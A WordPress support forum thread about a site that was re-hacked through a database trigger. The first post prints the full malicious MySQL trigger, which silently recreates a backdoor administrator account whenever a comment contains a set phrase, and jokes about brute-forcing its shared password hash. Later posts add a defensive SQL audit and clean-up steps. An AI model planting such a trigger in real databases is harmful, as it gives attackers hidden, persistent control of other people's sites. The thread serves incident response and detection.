[Resolved] Chris

    (@bundfegadmin)


    Hi there,
    I just helped a friend with a hacked website. It was round 2, because we had removed the false admin account (wp-admin | [email protected] – seems to be a known hacker account) and deleted/repaired all hacked files.
    When the account appeared again I looked deeper into everything.

    I found a trigger (name: after_insert_comment) in the database with the following code:

    -- Trigger body as posted; the CREATE TRIGGER header and the wp_comments table it fires on are assumed (not in the post).
    DELIMITER $$
    CREATE TRIGGER after_insert_comment AFTER INSERT ON database.wp_comments FOR EACH ROW
    BEGIN
         -- Fires on every new comment row (approved or held), but only acts on the attacker's chosen phrase
         IF NEW.comment_content LIKE '%are you struggling to get comments on your blog?%' THEN
             -- Pick the next free user ID
             SET @lastInsertWpUsersId = (SELECT MAX(id) FROM database.wp_users);
             SET @nextWpUsersID = @lastInsertWpUsersId + 1;
             -- Recreate the 'wpadmin' account with a fixed md5crypt ($1$) password hash
             INSERT INTO database.wp_users (ID, user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_activation_key, user_status, display_name) VALUES (@nextWpUsersID, 'wpadmin', '$1$yUXpYwXN$JhwwoGJxViPhtGdNG5UZs0', 'wpadmin', '[email protected]', 'https://wordpress.com', '2014-06-08 00:00:00', '', '0', 'Kris');
             -- Grant it the administrator role and the legacy user level 10
             INSERT INTO database.wp_usermeta (umeta_id, user_id, meta_key, meta_value) VALUES (NULL, @nextWpUsersID, 'wp_capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}');
             INSERT INTO database.wp_usermeta (umeta_id, user_id, meta_key, meta_value) VALUES (NULL, @nextWpUsersID, 'wp_user_level', '10');
         END IF;
     END$$
    DELIMITER ;
    

    I found the same trigger in three databases in the same webspace and wonder on how many pages this trigger is waiting.
    Is there any way that Wordfence could be able to find DB triggers and show them in the scan?

    PS: the password hash was the same in all triggers, so brute-forcing it could be pretty interesting, since you could get access to a lot of sites (I changed it just a bit ;-))

Viewing 7 replies - 1 through 7 (of 7 total)
  Thread Starter Chris

    (@bundfegadmin)

    PPS: Another backdoor I stumbled upon a few years ago, and Wordfence could potentially warn about: in the WordPress settings, “Membership – Anyone can register” was checked and “New User Default Role” was “Administrator”. I even think WordPress should prevent this setting in its core…
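
    The checks Chris asks Wordfence for in the first post, and the registration setting from the PPS, can be run by hand against the site's database. The MySQL/MariaDB audit below is an added example; it is not code from this thread, from Wordfence or from WordPress. It assumes you have run `USE <your_wp_database>` first, that the tables use the default `wp_` prefix (the `wp_capabilities` meta key changes with the prefix too), and that `$wp$` is the bcrypt prefix newer WordPress releases write. The trigger name `after_insert_comment` and the account name `wpadmin` are taken from the first post; everything else is a generic check.

```sql
-- Added audit for the persistence mechanisms described in this thread.
-- Run as the WordPress DB user after: USE your_wp_database;
-- Assumes the default table prefix wp_ (change it if the site uses another).

-- 1. Every trigger in this schema. A stock WordPress install creates none,
--    so any row here needs a human look; the SQL it runs is ACTION_STATEMENT.
SELECT TRIGGER_NAME, EVENT_MANIPULATION, EVENT_OBJECT_TABLE, CREATED, ACTION_STATEMENT
FROM information_schema.TRIGGERS
WHERE TRIGGER_SCHEMA = DATABASE();

-- 2. Stored routines and scheduler events are the other two places SQL can
--    hide and run without any PHP file on disk. WordPress creates none either.
SELECT ROUTINE_TYPE, ROUTINE_NAME, CREATED, ROUTINE_DEFINITION
FROM information_schema.ROUTINES
WHERE ROUTINE_SCHEMA = DATABASE();

SELECT EVENT_NAME, STATUS, INTERVAL_VALUE, INTERVAL_FIELD, EVENT_DEFINITION
FROM information_schema.EVENTS
WHERE EVENT_SCHEMA = DATABASE();

-- 3. Who is an administrator right now. Reading the capabilities meta row
--    catches accounts a trigger inserted directly, which never pass through
--    WordPress registration. (With prefix foo_ the key is foo_capabilities.)
SELECT u.ID, u.user_login, u.user_email, u.user_registered, m.meta_value
FROM wp_users AS u
JOIN wp_usermeta AS m ON m.user_id = u.ID
WHERE m.meta_key = 'wp_capabilities'
  AND m.meta_value LIKE '%administrator%';

-- 4. Password hashes WordPress did not write. WordPress stores phpass hashes
--    ($P$), bcrypt ($2y$, or $wp$-prefixed in newer releases) or legacy 32-hex
--    MD5. The trigger in this thread planted an md5crypt hash ($1$...), which
--    wp_check_password() still accepts via the phpass crypt() fallback, so a
--    foreign prefix is a reliable tell.
SELECT ID, user_login, user_email, LEFT(user_pass, 4) AS hash_prefix, user_registered
FROM wp_users
WHERE user_pass NOT LIKE '$P$%'
  AND user_pass NOT LIKE '$2y$%'
  AND user_pass NOT LIKE '$wp$%'
  AND user_pass NOT REGEXP '^[0-9a-f]{32}$';

-- 5. The open-registration backdoor from the PPS: anyone may register and
--    new users default to administrator.
SELECT option_name, option_value
FROM wp_options
WHERE option_name IN ('users_can_register', 'default_role');

-- 6. Clean-up once the findings have been read. The trigger and account names
--    are the ones from the first post; use whatever steps 1 and 3 returned.
DROP TRIGGER IF EXISTS after_insert_comment;
DELETE FROM wp_usermeta WHERE user_id IN (SELECT ID FROM wp_users WHERE user_login = 'wpadmin');
DELETE FROM wp_users WHERE user_login = 'wpadmin';
UPDATE wp_options SET option_value = '0'          WHERE option_name = 'users_can_register';
UPDATE wp_options SET option_value = 'subscriber' WHERE option_name = 'default_role';
```

    Step 1 is the one a file scanner cannot replace: the trigger lives only in the database, so re-uploading a clean copy of WordPress leaves it in place, and the first comment containing the phrase recreates the account. Because WordPress core never creates triggers, routines or events, the application's database account does not need the TRIGGER, CREATE ROUTINE or EVENT privileges; revoking them (for example `REVOKE TRIGGER ON your_wp_database.* FROM 'wpuser'@'localhost'`) limits what an attacker who has read wp-config.php can plant next time. Rotating the database password after the clean-up, as Wordfence support recommends below, is what actually closes the door the trigger came in through.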

    Hey @bundfegadmin,

    Regarding your concern (second comment), you’re absolutely right.

    Your concern has already been presented to the WordPress Core Trac Team and is still active. For details, see WordPress Core Ticket No. 43936.

    Hope this helps.

    Cheerio!

    Plugin Support wfpeter

    (@wfpeter)

    Hi @bundfegadmin, thanks for the detailed information about what you’d had to fix in this case.

    I have mentioned this to our team and I believe a check for this specific malware is being discussed although I can’t provide ongoing updates here on the forums.

    I’ll just provide our site-cleaning documents below for reference just in case any checks have been missed or may help in future: https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/

    Make sure WordPress core and all of your plugins and themes are updated. Also, as the database triggers were affected in this case, update your passwords for the hosting control panel, FTP, WordPress admin users, and database.

    Additionally you might find the WordPress Malware Removal section in our free Learning Center helpful.

    Thanks,

    Peter.

    Thread Starter Chris

    (@bundfegadmin)

    Hi folks,

    @generosus thanks for the post in the mentioned ticket. Are these times normal? That started 5 years ago. I am really not familiar with this community.

    @wfpeter thanks for considering it. Good luck to your team. And thanks for the fine Learning Center. I will look into it.

    Chris

    Hello everyone,

    I woke up yesterday to a site completely wiped from my Bluehost hosting account. It had a generic database connection error, per se, but when my team restored the deleted site I went in and saw a bunch of [email protected] entries as the wpadmin.

    I went around to re-enable my Wordfence, which I don’t know why I am paying for. I am not as savvy with WordPress as with datacenter infrastructure, so I am looking for some advice as to how to minimize risk and what security solution you guys recommend.

    Cheers

    Zack

    @bundfegadmin we had a site hit with the same thing. Are you able to recall which database table(s) that SQL was injected in? Thx!

    Thread Starter Chris

    (@bundfegadmin)

    @wilrevehl: the code I pasted in the first post was from a “trigger” (it acts automatically when the conditions are met, in this case a new comment with specific content), not from a table. And it inserts data into wp_users and wp_usermeta (as you can see in the three INSERT statements).

    Was this your question? I am not sure; if not, perhaps you could rephrase it.

The topic ‘Re-Hacked via DB-Trigger’ is closed to new replies.